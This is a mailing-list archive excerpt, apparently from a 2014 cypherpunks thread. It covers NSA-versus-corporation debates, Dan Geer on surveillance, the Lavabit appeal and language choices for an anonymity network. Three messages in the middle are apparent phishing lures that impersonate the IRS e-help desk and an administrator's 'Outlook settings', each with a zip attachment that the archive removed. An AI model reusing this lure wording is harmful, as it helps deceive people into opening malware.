threat to the >> people than government is. Well, boeing is the biggest military contractor on the planet? GM stands for government motors, no? google, facebook, nsa front ends, etc. 
Materially, they are a lesser threat than the government since their business is not to kill people (well boeing just makes the weapons...), but, they are the main criminal partners of the government anyway. Looks like Dan Geer wants to divert attention from the 'legal' masters of corporatism to the corporatists themselves.... >> Legally, none of them can do what you quoted >> above. > > From juan.g71 at gmail.com Wed Apr 16 13:03:18 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Wed, 16 Apr 2014 17:03:18 -0300 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <683CE972F2F2807237FC4B2E@F74D39FA044AA309EAEA14B9> --On Wednesday, April 16, 2014 3:01 PM +0200 Lodewijk andré de la porte wrote: > > And neither can persons! > > Government having a violence monopoly is EXACTLY the idea! Yep. The stupidest idea that political theory ever produced. Outright tyrants are at least honest. > And one I > wholeheartedly wish would be 100% effective and fair! Actually if the > government would just TAKE all the violence and write it to /dev/null > that's be PERFECT for me. Then we can start struggling with less demons > such as abuse of power and wealth. > > Doesn't it just disgust you to think that anyone could be used sexually in > whatever means, provided sufficient money compensates someone for it? No, that's the kind of thing that conservatives and their sick outlook on sex find 'disgusting'. It's a common occurrence in 'christian' pseudo civilization. > What > kind of violence is it that someone can provide something so compelling > that he/she would do anything to get it? 
Think of how that used person > convinces him/herself to do something completely unnatural, so disgusting > it makes one retch, sheerly for an imaginary compensation. > > I wonder how well that situation is actually the situation for many > prostitutes in present day. > > Is this even related? Oh yes, the NSA. Well. Seems this has become a > thread about unnatural and utterly disgusting things. > From dan at geer.org Wed Apr 16 16:57:17 2014 From: dan at geer.org (dan at geer.org) Date: Wed, 16 Apr 2014 19:57:17 -0400 Subject: NSA good guys In-Reply-To: Your message of "Wed, 16 Apr 2014 16:59:11 -0300." <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> Message-ID: <20140416235717.23ED22280B3@palinka.tinho.net> > Looks like Dan Geer wants to divert attention from the 'legal' masters > of corporatism to the corporatists themselves.... It depends on whether you believe that a promise of procedurally satisfactory data handling can be relied upon. Quoting (as I'm on the record) from "Tradeoffs in Cyber Security," given last October at the Univ. of North Carolina, Charlotte. http://geer.tinho.net/geer.uncc.9x13.txt Today I observe a couple fornicating on a roof top in circumstances where I can never know who the couple are. Do they have privacy? The answer is "no" if your definition of privacy is the absence of observability. The answer is "yes" if your definition of privacy is the absence of identifiability. Technical progress in image acquisition guarantees observability pretty much everywhere now. Standoff biometrics are delivering multi-factor identifiability at ever greater distances. We will soon live in a society where identity is not an assertion like "My name is Dan," but rather an observable like "Sensors confirm that is Dan." With enough sensors, concentration camps don't need to tattoo their inmates. How many sensors are we installing in normal life? 
If routine data acquisition kills both privacy as impossible-to-observe and privacy as impossible-to-identify, then what might be an alternative? If you are an optimist or an apparatchik, then your answer will tend toward rules of procedure administered by a government you trust or control. If you are a pessimist or a hacker/maker, then your answer will tend towards the operational, and your definition of a state of privacy will be mine: the effective capacity to misrepresent yourself. --dan ===== the above and other material on file under geer.tinho.net/pubs From tpb-crypto at laposte.net Wed Apr 16 12:10:31 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 21:10:31 +0200 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <369280624.186455.1397675431492.JavaMail.www@wwinf8311> > Message du 16/04/14 15:01 > De : "Lodewijk andré de la porte" > A : tpb-crypto at laposte.net > Copie à : "Gregory Foster" , "cypherpunks at cpunks.org" > Objet : Re: NSA good guys > > 2014-04-16 12:16 GMT+02:00 : > > > > Message du 16/04/14 10:16 > > > De : "Gregory Foster" > > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > > > Companies cannot seize your property, put you in jail and queue you > > > > to the death row. > > > > > > http://en.wikipedia.org/wiki/Academi > > > > > > > The company received widespread publicity in 2007 when a group of > > > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > > > aftermath of Hurricane Katrina by the United States Department of > > > > Homeland Security, as well as by private clients, including > > > > communications, petrochemical and insurance companies. 
> > > > > > > Ok, the exception that confirms the rule, that was a company hired by the > > government to do its dirty job, ie, mercenaries. > > > > Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such > > services or do it themselves, they continue to be a lesser threat to the > > people than government is. Legally, none of them can do what you quoted > > above. > > > And neither can persons! > > Government having a violence monopoly is EXACTLY the idea! And one I > wholeheartedly wish would be 100% effective and fair! Actually if the > government would just TAKE all the violence and write it to /dev/null > that's be PERFECT for me. Then we can start struggling with less demons > such as abuse of power and wealth. > > Doesn't it just disgust you to think that anyone could be used sexually in > whatever means, provided sufficient money compensates someone for it? What > kind of violence is it that someone can provide something so compelling > that he/she would do anything to get it? Think of how that used person > convinces him/herself to do something completely unnatural, so disgusting > it makes one retch, sheerly for an imaginary compensation. > > I wonder how well that situation is actually the situation for many > prostitutes in present day. > > Is this even related? Oh yes, the NSA. Well. Seems this has become a thread > about unnatural and utterly disgusting things. > Well, we were talking about the dangers of companies vs. danger of governments. Before a girl turns into a prostitute, with the exception of countries like Haiti and Democratic Republic of Congo, she can try and do other things rather than sell her body. Even in the third world, there's plenty of shopping centers, laundry and cleaning works they can try. It pays less, but it also doesn't violate anyone's bodies. Most prostitutes had a choice at least once. 
From l at odewijk.nl Wed Apr 16 16:32:30 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Thu, 17 Apr 2014 01:32:30 +0200 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: <1397665184.25313.1.camel@anglachel> References: <1397665184.25313.1.camel@anglachel> Message-ID: 2014-04-16 18:19 GMT+02:00 Ted Smith : > I think the documents are significantly earlier than that. > You'd say so, but we really have no idea. Maybe he was adding pages slowly. Maybe he was still while moving into Russia. Computers are tricky like that :( > Also, there are definitely classifications above and within TOP SECRET. > Look at the annotations on the Snowden documents. > Yeah, I know. That's why there were "" marks. I should have really made that clearer haha. Sorry about that. I sort of meant "TOP-EST SECRET" would still have another layer. And just cells. The NSA must have separated information cells . Cells that do not share sysadmins with badly defined rights ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1320 bytes Desc: not available URL: From irs.e-helpmail at irs.gov Thu Apr 17 02:22:50 2014 From: irs.e-helpmail at irs.gov (irs.e-helpmail at irs.gov) Date: Thu, 17 Apr 2014 09:22:50 GMT Subject: E-mail Receipt Confirmation - Ticket#SD9589207 Message-ID: The IRS e-help Desk has received your email on 04/17/14. A case has been opened in response to your question or issue. Your case ID is : SD9589207 Details about this case has been attached. If additional contact is necessary, please reference this case ID. You will receive a reply within two business days. Thank you for contacting the IRS e-help Desk. ---------------------------------------------------------------------------------------------------- Do not submit confidential information, such as Taxpayer Identification Number (TIN), EFIN, or ETIN in your e-mail correspondence. 
NOTE: We are providing a written response to your question using the information you have provided us in your original message. Our written response is NOT to be considered either a revenue ruling or determination letter, which are prepared by the Department of Treasury Chief Counsel. -------------- next part -------------- A non-text attachment was scrubbed... Name: SD9589207.zip Type: application/zip Size: 6784 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 17 02:47:28 2014 From: Administrator at jfet.org (Administrator) Date: Thu, 17 Apr 2014 09:46:88 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6603 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 17 03:07:45 2014 From: Administrator at jfet.org (Administrator) Date: Thu, 17 Apr 2014 09:67:45 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: OutlookSettings.zip Type: application/zip Size: 6603 bytes Desc: not available URL: From dan at geer.org Thu Apr 17 13:48:30 2014 From: dan at geer.org (dan at geer.org) Date: Thu, 17 Apr 2014 16:48:30 -0400 Subject: Lavabit Message-ID: <20140417204831.0F3822280B3@palinka.tinho.net> http://www.techweekeurope.co.uk/news/lavabit-snowden-appeal-lost-144112 Lavabit Loses Contempt Of Court Appeal Failure to hand over encryption keys could land Lavabit founder Levison with hefty fines On April 17, 2014 by Thomas Brewster Lavabit, the email service once used by whistleblower Edward Snowden, has lost an appeal against a contempt of court ruling that he delayed the US Government's attempts to gather information by refusing to hand over encryption keys. The email service, which has since closed, was eventually forced to comply anyway. The US government asked for SSL keys to look at the metadata (dates and other details of communications) for a specific Lavabit user, believed to be Snowden. The service's founder Ladar Levison at first refused, and when forced to comply, provided the keys printed in a tiny typeface. The court ruled that Lavabit had not followed correct procedures in its initial hearings, and had not raised a specific challenge to the district court's authority under the so-called "pen/trap statute". Levison could now be fined for contempt. "Levison's statement to the district court simply reflected his personal angst over complying with the pen/trap order, not his present appellate argument that questions whether the district court possessed the authority to act at all," read a statement from the fourth US circuit court of appeals Judge G Steven Agee. "Arguments raised in a trial court must be specific and in line with those raised on appeal." The case stems back to June last year, when the US government sought to acquire private keys for SSL encrypted traffic of a specific Lavabit user, thought to be Snowden. 
Officials sought to put a tap on the communications of that target to collect metadata. Levison, when approached by FBI officials, refused to hand over the keys, which eventually led to the contempt of court charge. According to the court filing denying his appeal, Levison suggested he could provide the content the government was after, rather than using their interception tools. The government declined the offer, saying it needed real-time acquisition of the target's data. A device to intercept traffic was installed as part of the pen/trap order, but could not gather usable information as the encryption keys had not been provided. Officials did eventually get the keys in August 2013, however. "The government sought penalties of $5,000 a day until Lavabit provided the encryption keys to the government. The district court granted the motion for sanctions that day. Two days later, Levison provided the keys to the government. By that time, six weeks of data regarding the target had been lost," the court ruling read. Levison could now be fined thousands of dollars. From coderman at gmail.com Thu Apr 17 18:14:55 2014 From: coderman at gmail.com (coderman) Date: Thu, 17 Apr 2014 18:14:55 -0700 Subject: SMTP is bad, guys (and gals, and other spectrum earth humans) Message-ID: On Wed, Apr 16, 2014 at 6:29 AM, Georgi Guninski wrote: > On Wed, Apr 16, 2014 at 04:55:27AM -0700, coderman wrote: >> >> and private >> industry privacy invasion, as they're both faces of unrestrained > > weird to write this from gmail account :) nothing conveys my contempt for email like gmail! 
*grin* From juan.g71 at gmail.com Thu Apr 17 15:02:11 2014 From: juan.g71 at gmail.com (Juan) Date: Thu, 17 Apr 2014 19:02:11 -0300 Subject: NSA good guys In-Reply-To: <20140416235717.23ED22280B3@palinka.tinho.net> References: <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> <20140416235717.23ED22280B3@palinka.tinho.net> Message-ID: <53504f61.04693a0a.602f.5a7e@mx.google.com> On Wed, 16 Apr 2014 19:57:17 -0400 dan at geer.org wrote: > > > Looks like Dan Geer wants to divert attention from the 'legal' > > masters of corporatism to the corporatists themselves.... > > It depends on whether you believe that a promise of procedurally > satisfactory data handling can be relied upon. If you mean promises from the government, or from their corporatist partners, no, of course, I don't. Regarding your quote below, it may be possible, in the not-so-distant-future, to record people in ultra high definition from a mile away, but the 'technology' can be rendered rather useless with something like...this http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg Of course, at that point, google and general dynamics are going to knock on the pentagon's door and ask them to ban masks. Quoting (as I'm on > the record) from "Tradeoffs in Cyber Security," given last October > at the Univ. of North Carolina, Charlotte. > > http://geer.tinho.net/geer.uncc.9x13.txt > > > > Today I observe a couple fornicating on a roof top in circumstances > where I can never know who the couple are. Do they have privacy? > The answer is "no" if your definition of privacy is the absence of > observability. The answer is "yes" if your definition of privacy > is the absence of identifiability. > > Technical progress in image acquisition guarantees observability > pretty much everywhere now. Standoff biometrics are delivering > multi-factor identifiability at ever greater distances. 
> We will
> soon live in a society where identity is not an assertion like "My
> name is Dan," but rather an observable like "Sensors confirm that
> is Dan." With enough sensors, concentration camps don't need to
> tattoo their inmates. How many sensors are we installing in normal
> life?
>
> If routine data acquisition kills both privacy as
> impossible-to-observe and privacy as impossible-to-identify, then
> what might be an alternative? If you are an optimist or an
> apparatchik, then your answer will tend toward rules of procedure
> administered by a government you trust or control. If you are a
> pessimist or a hacker/maker, then your answer will tend towards the
> operational, and your definition of a state of privacy will be mine:
> the effective capacity to misrepresent yourself.
>
>
>
>
> --dan
> =====
> the above and other material on file under geer.tinho.net/pubs
>
>

From dan at geer.org Thu Apr 17 19:09:36 2014
From: dan at geer.org (dan at geer.org)
Date: Thu, 17 Apr 2014 22:09:36 -0400
Subject: NSA good guys
In-Reply-To: Your message of "Thu, 17 Apr 2014 19:02:11 -0300." <53504f61.04693a0a.602f.5a7e@mx.google.com>
Message-ID: <20140418020936.D82A62280DC@palinka.tinho.net>

 |
 | It may be possible, in the not-so-distant-future, to record
 | people in ultra high definition from a mile away, but the
 | 'technology' can be rendered rather useless with something
 | like...this
 |
 | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
 |

At this time, it is possible to do facial recognition at 500 meters, iris recognition at 50 meters, and heartbeat recognition at 5 meters. A newspaper open on a table can be read from orbit. DNA samples can be matched in under half an hour. Your smartphone can identify your gait, your face in that selfie, the idiosyncrasies of your typing, your fingerprint and/or anything else you wish to lay on the screen.
Light fixtures in public venues provide light but also house a camera, sensors for CO/CO2/pollutant emissions, seismic activity, humidity & UV radiation, a microphone, wifi and/or cellular interfaces, an extensible API, an IPv4 or v6 address per LED, a capacity for disconnected "decision making on the pole," and cloud-based remote management. Every cow you eat is tracked cradle to grave with RFID tagging under the National Animal Identification System, the infrastructure for which handles 100 million cattle and works for any mammal, of which you are one. Any newish car is broadcasting several Bluetooth beacons, as is your newish iPhone. Forensics can now match photo to camera as crisply as matching bullet to barrel. The Smart Meter soon to be imposed on your electric tap will know everything you own, and report. More and more people you meet will be part of the system -- that wearables like Google Glass are so readily detectable is just a brief moment in time. Cars are soon to be mandated to implement wireless vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications using extensible protocols intended to include route-based payment now that too many people are driving green cars. Your various insurers will buy your data for a pittance of discount but will also know when, say, blood pressure for everyone in the house or the neighborhood rises together. A wife may not be impelled to testify against a husband, but cannot her digital exhaust be subpoenaed to the same effect?

But you know all that, paper hospital masks notwithstanding.

--dan

From scott at sbce.org Thu Apr 17 22:14:53 2014
From: scott at sbce.org (Scott Blaydes)
Date: Fri, 18 Apr 2014 00:14:53 -0500
Subject: Lavabit
In-Reply-To: <20140417204831.0F3822280B3@palinka.tinho.net>
References: <20140417204831.0F3822280B3@palinka.tinho.net>
Message-ID:

Now that is something I would help crowd fund, the paying of the dude’s contempt of court fines.
Who cares about kickstarting some group’s game, or helping bring a cellphone-activated door lock to market. I would rather kick some cash to the guy who did as much as he could to keep his clients’ data “safe”, even when threatened by three letter agencies. That’s some balls in my book.

Thank you,
Scott Blaydes

On Apr 17, 2014, at 3:48 PM, dan at geer.org wrote:

>
> http://www.techweekeurope.co.uk/news/lavabit-snowden-appeal-lost-144112
>
> Lavabit Loses Contempt Of Court Appeal
>
> Failure to hand over encryption keys could land Lavabit founder Levison
> with hefty fines
> On April 17, 2014 by Thomas Brewster
>
> Lavabit, the email service once used by whistleblower Edward
> Snowden, has lost an appeal against a contempt of court ruling
> that he delayed the US Government's attempts to gather information
> by refusing to hand over encryption keys. The email service,
> which has since closed, was eventually forced to comply anyway.
>
> The US government asked for SSL keys to look at the metadata
> (dates and other details of communications) for a specific Lavabit
> user, believed to be Snowden. The service's founder Ladar Levison
> at first refused, and when forced to comply, provided the keys
> printed in a tiny typeface.
>
> The court ruled that Lavabit had not followed correct procedures
> in its initial hearings, and had not raised a specific challenge
> to the district court's authority under the so-called "pen/trap
> statute". Levison could now be fined for contempt.
>
> "Levison's statement to the district court simply reflected his
> personal angst over complying with the pen/trap order, not his
> present appellate argument that questions whether the district
> court possessed the authority to act at all," read a statement
> from the fourth US circuit court of appeals Judge G Steven Agee.
>
> "Arguments raised in a trial court must be specific and in line
> with those raised on appeal."
>
> The case stems back to June last year, when the US government
> sought to acquire private keys for SSL encrypted traffic of a
> specific Lavabit user, thought to be Snowden. Officials sought
> to put a tap on the communications of that target to collect
> metadata.
>
> Levison, when approached by FBI officials, refused to hand over
> the keys, which eventually led to the contempt of court charge.
>
> According to the court filing denying his appeal, Levison suggested
> he could provide the content the government was after, rather
> than using their interception tools. The government declined the
> offer, saying it needed real-time acquisition of the target's
> data.
>
> A device to intercept traffic was installed as part of the
> pen/trap order, but could not gather usable information as the
> encryption keys had not been provided.
>
> Officials did eventually get the keys in August 2013, however.
> "The government sought penalties of $5,000 a day until Lavabit
> provided the encryption keys to the government. The district
> court granted the motion for sanctions that day. Two days later,
> Levison provided the keys to the government. By that time, six
> weeks of data regarding the target had been lost," the court
> ruling read.
>
> Levison could now be fined thousands of dollars.
>
>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 842 bytes
Desc: Message signed with OpenPGP using GPGMail
URL:

From jya at pipeline.com Fri Apr 18 05:46:50 2014
From: jya at pipeline.com (John Young)
Date: Fri, 18 Apr 2014 08:46:50 -0400
Subject: NSA good guys
In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net>
References: <20140418020936.D82A62280DC@palinka.tinho.net>
Message-ID:

The eye of god is upon the earth, sin not heathens. Unavoidable sin is required to justify god business. No insecurity, no god security blanket app. Prayer is more effective than encryption.
Kickstart a religion, call it Darksec. Give away free, with 3D funny hats and walks and masks. Beguile officials into raiding your printer buried under Hettinga's compost of coconut shell Bitcoins.

At 10:09 PM 4/17/2014, dan at geer.org wrote:
> |
> | It may be possible, in the not-so-distant-future, to record
> | people in ultra high definition from a mile away, but the
> | 'technology' can be rendered rather useless with something
> | like...this
> |
> | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
> |
>
>
> At this time, it is possible to do facial recognition at 500 meters,
> iris recognition at 50 meters, and heartbeat recognition at 5 meters.
> A newspaper open on a table can be read from orbit. DNA samples
> can be matched in under half an hour. Your smartphone can identify
> your gait, your face in that selfie, the idiosyncrasies of your
> typing, your fingerprint and/or anything else you wish to lay on
> the screen. Light fixtures in public venues provide light but also
> house a camera, sensors for CO/CO2/pollutant emissions, seismic
> activity, humidity & UV radiation, a microphone, wifi and/or cellular
> interfaces, an extensible API, an IPv4 or v6 address per LED, a
> capacity for disconnected "decision making on the pole," and
> cloud-based remote management. Every cow you eat is tracked cradle
> to grave with RFID tagging under the National Animal Identification
> System, the infrastructure for which handles 100 million cattle and
> works for any mammal, of which you are one. Any newish car is
> broadcasting several Bluetooth beacons as is your newish iPhone.
> Forensics can now match photo to camera as crisply as matching
> bullet to barrel. The Smart Meter soon to be imposed on your
> electric tap will know everything you own, and report. More and
> more people you meet will be part of the system -- that wearables
> like Google Glass are so readily detectable is just a brief moment
> in time.
> Cars are soon to be mandated to implement wireless
> vehicle-to-vehicle (V2V) and vehicle to infrastructure (V2I)
> communications using extensible protocols intended to include
> route-based payment now that too many people are driving green cars.
> Your various insurers will buy your data for a pittance of discount
> but will also know when, say, blood pressure for everyone in the
> house or the neighborhood rises together. A wife may not be impelled
> to testify against a husband, but cannot her digital exhaust be
> subpoenaed to the same effect?
>
>
> But you know all that, paper hospital masks notwithstanding.
>
> --dan

From stevens at mpi-sws.org Fri Apr 18 01:26:37 2014
From: stevens at mpi-sws.org (Stevens Le Blond)
Date: Fri, 18 Apr 2014 10:26:37 +0200
Subject: Programming language for anonymity network
Message-ID: <5350E1BD.5010304@mpi-sws.org>

Hello,

We are a team of researchers working on the design and implementation of a traffic-analysis resistant anonymity network and we would like to request your opinion regarding the choice of a programming language / environment. Here are the criteria:

1) Familiarity: The language should be familiar or easy to learn for most potential contributors, as we hope to build a diverse community that builds on and contributes to the code.

2) Maturity: The language implementation, tool chain and libraries should be mature enough to support a production system.

3) Language security: The language should minimize the risk of security relevant bugs like buffer overflows.

4) Security of runtime / tool chain: It should be hard to inconspicuously backdoor the tool chain and, if applicable, runtime environments.

To give two concrete examples:

Using the C language + deterministic builds is an attractive option with respect to 1), 2) and 4), but doesn’t provide much regarding 3).

Java does better with respect to 3), however, it trades some of 3) and 4) as compared to C.
Specifically, we are concerned that large runtimes may be difficult to audit. A similar argument may apply to other interpreted languages.

Given these criteria, what language would you choose and for what reasons? We would also appreciate feedback regarding our criteria.

All the best,
David, Nick, Peter, Stevens, and William

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 900 bytes
Desc: OpenPGP digital signature
URL:

From cathalgarvey at cathalgarvey.me Fri Apr 18 04:21:13 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey)
Date: Fri, 18 Apr 2014 12:21:13 +0100
Subject: Programming language for anonymity network
In-Reply-To: <5350E1BD.5010304@mpi-sws.org>
References: <5350E1BD.5010304@mpi-sws.org>
Message-ID: <53510AA9.5040307@cathalgarvey.me>

I'm not an expert on compiled languages by any stretch, but my 2c:

A) Dlang is designed to be memory safe, has a close syntax to C and is easily interfaced with it. It's garbage-collected but you can disable that, as well as all other safety guarantees, if you choose. There are working bindings for Lua, so you can implement a scripting backend easily. It's multi-paradigm, with room for OOP, struct-based or functional, or whatever. It doesn't have much builtin crypto but can be linked to C crypto.

B) Rust is designed as a memory-safe systems language and looks really nice as a replacement for C, but I get the impression that (like Golang) it's "too" strict and may get in the way of some low-level work. It also has Lua bindings but I don't know how mature they are. I don't think it's garbage collected which adds a bit of work to the securing part of the job. I don't know about crypto support.

C) Golang is memory safe and bounds-checked, and garbage-collected, but unlike Dlang lacks scripting bindings AFAIK, and is "too" strict. It's not multi-paradigm, perhaps too stuck in the "Look like C" mud.
Personally, I don't like or recommend Golang, but I mention it because unlike the above, it has *excellent* crypto-support in an external, but officially supported, library set.

..and then there's scripting languages, which (if written correctly) can be competitive on speed, benefit from JIT, and have the large advantage of not requiring compilation prior to use. That means not worrying about deterministic builds, because the source is the program. Of these, Python and Lua are the only ones I'd consider; the former is mature, powerful, and has huge library support. The latter is barebones and would need additional libraries to work, but if you stick to the somewhat outdated Lua 5.1 you can use LuaJIT, which is considered the fastest scripting language out there, faster even than some compiled languages. Python does have PyPy, but it's such a nightmare to compile I'm not a big fan. Both Lua and Python have bindings to libsodium and libnacl.

Some precedent: Bitmessage was supposed to be traffic-analysis resilient, and used an odd stream-based discovery system. It was written entirely in Python with a Qt frontend.

On 18/04/14 09:26, Stevens Le Blond wrote:
>
> Hello,
>
> We are a team of researchers working on the design and implementation of
> a traffic-analysis resistant anonymity network and we would like to
> request your opinion regarding the choice of a programming language /
> environment. Here are the criteria:
>
> 1) Familiarity: The language should be familiar or easy to learn for
> most potential contributors, as we hope to build a diverse community
> that builds on and contributes to the code.
>
> 2) Maturity: The language implementation, tool chain and libraries
> should be mature enough to support a production system.
>
> 3) Language security: The language should minimize the risk of security
> relevant bugs like buffer overflows.
>
> 4) Security of runtime / tool chain: It should be hard to
> inconspicuously backdoor the tool chain and, if applicable, runtime
> environments.
>
> To give two concrete examples:
>
> Using the C language + deterministic builds is an attractive option with
> respect to 1), 2) and 4), but doesn’t provide much regarding 3).
>
> Java does better with respect to 3), however, it trades some of 3) and
> 4) as compared to C. Specifically, we are concerned that large runtimes
> may be difficult to audit. A similar argument may apply to other
> interpreted languages.
>
> Given these criteria, what language would you choose and for what
> reasons? We would also appreciate feedback regarding our criteria.
>
> All the best,
> David, Nick, Peter, Stevens, and William
>

--
T: @onetruecathal, @IndieBBDNA
P: +353876363185
W: http://indiebiotech.com

-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x988B9099.asc
Type: application/pgp-keys
Size: 6176 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 901 bytes
Desc: OpenPGP digital signature
URL:

From tedks at riseup.net Fri Apr 18 10:41:11 2014
From: tedks at riseup.net (Ted Smith)
Date: Fri, 18 Apr 2014 13:41:11 -0400
Subject: [tor-talk] Programming language for anonymity network
In-Reply-To: <5350E1BD.5010304@mpi-sws.org>
References: <5350E1BD.5010304@mpi-sws.org>
Message-ID: <1397842871.5862.11.camel@anglachel>

OCaml. http://ocaml.org/

1. OCaml is more obscure than many languages, but it supports programming in imperative, object-oriented, and functional styles (though it's obviously best suited for a functional style). I've seen people write Java in OCaml and produce clean, modular code.

2. OCaml is used in industrial environments (it's gotten pretty popular on Wall Street) and in open-source projects; the toolchain is mature and the community is vibrant.

3.
OCaml is memory safe, but more importantly, it's type safe, and its type system is capable of encoding a great deal of your program's correctness. It will take some time to get your program to compile, but when it does you have a much stronger assurance that your program is correct than you do in C, C++, or Java.

4. OCaml compiles to native code; I'm not sure if deterministic builds have been done but they should be possible.

5. (Performance, the hidden elephant in every language discussion room) The OCaml team takes security seriously, and OCaml is performance-competitive with C. OCaml does tail-call elimination, so you can write programs functionally that are memory-efficient.

6. (Weaknesses) OCaml has a global lock due to its garbage collection, so parallel programming has to be done with processes. This is (IMO) cleaner than in similar situations like Python, but is obviously suboptimal.

I'd highly recommend reading through this blog series, chronicling a developer picking OCaml as the language to rewrite a large Python open-source project in. It doesn't have the same focus as you, but it goes over various reasons why someone might switch to OCaml, and introduces some OCaml features: http://roscidus.com/blog/blog/categories/ocaml/

On Fri, 2014-04-18 at 10:26 +0200, Stevens Le Blond wrote:
> Hello,
>
> We are a team of researchers working on the design and implementation of
> a traffic-analysis resistant anonymity network and we would like to
> request your opinion regarding the choice of a programming language /
> environment. Here are the criteria:
>
> 1) Familiarity: The language should be familiar or easy to learn for
> most potential contributors, as we hope to build a diverse community
> that builds on and contributes to the code.
>
> 2) Maturity: The language implementation, tool chain and libraries
> should be mature enough to support a production system.
>
> 3) Language security: The language should minimize the risk of security
> relevant bugs like buffer overflows.
>
> 4) Security of runtime / tool chain: It should be hard to
> inconspicuously backdoor the tool chain and, if applicable, runtime
> environments.
>
> To give two concrete examples:
>
> Using the C language + deterministic builds is an attractive option with
> respect to 1), 2) and 4), but doesn’t provide much regarding 3).
>
> Java does better with respect to 3), however, it trades some of 3) and
> 4) as compared to C. Specifically, we are concerned that large runtimes
> may be difficult to audit. A similar argument may apply to other
> interpreted languages.
>
> Given these criteria, what language would you choose and for what
> reasons? We would also appreciate feedback regarding our criteria.
>
> All the best,
> David, Nick, Peter, Stevens, and William
>

--
Sent from Ubuntu

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part
URL:

From juan.g71 at gmail.com Fri Apr 18 10:01:52 2014
From: juan.g71 at gmail.com (Juan)
Date: Fri, 18 Apr 2014 14:01:52 -0300
Subject: NSA good guys
In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net>
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net>
Message-ID: <535184aa.0562340a.0d71.ffffd9d1@mx.google.com>

On Thu, 17 Apr 2014 22:09:36 -0400
dan at geer.org wrote:

>
> |
> | It may be possible, in the not-so-distant-future, to record
> | people in ultra high definition from a mile away, but the
> | 'technology' can be rendered rather useless with something
> | like...this
> |
> | http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg
> |
>
>
> At this time, it is possible to do facial recognition at 500 meters,
> iris recognition at 50 meters, and heartbeat recognition at 5 meters.
> A newspaper open on a table can be read from orbit. DNA samples
> can be matched in under half an hour. Your smartphone can identify
> your gait, your face in that selfie, the idiosyncrasies of your
> typing, your fingerprint and/or anything else you wish to lay on
> the screen. Light fixtures in public venues provide light but also
> house a camera, sensors for CO/CO2/pollutant emissions, seismic
> activity, humidity & UV radiation, a microphone, wifi and/or cellular
> interfaces, an extensible API, an IPv4 or v6 address per LED, a
> capacity for disconnected "decision making on the pole," and
> cloud-based remote management. Every cow you eat is tracked cradle
> to grave with RFID tagging under the National Animal Identification
> System, the infrastructure for which handles 100 million cattle and
> works for any mammal, of which you are one. Any newish car is
> broadcasting several Bluetooth beacons as is your newish iPhone.
> Forensics can now match photo to camera as crisply as matching
> bullet to barrel. The Smart Meter soon to be imposed on your
> electric tap will know everything you own, and report. More and
> more people you meet will be part of the system -- that wearables
> like Google Glass are so readily detectable is just a brief moment
> in time. Cars are soon to be mandated to implement wireless
> vehicle-to-vehicle (V2V) and vehicle to infrastructure (V2I)
> communications using extensible protocols intended to include
> route-based payment now that too many people are driving green cars.
> Your various insurers will buy your data for a pittance of discount
> but will also know when, say, blood pressure for everyone in the
> house or the neighborhood rises together. A wife may not be impelled
> to testify against a husband, but cannot her digital exhaust be
> subpoenaed to the same effect?
>
>
> But you know all that, paper hospital masks notwithstanding.

Well, the scenario you paint is scary and looks a bit like science fiction.
On one hand I do get your point. On the other hand I can't help but mention again that your iris-recognition-from-orbit can be defeated with $5 contact lenses. Other 'technologies' can certainly be more intrusive.

> The Smart Meter soon to be imposed

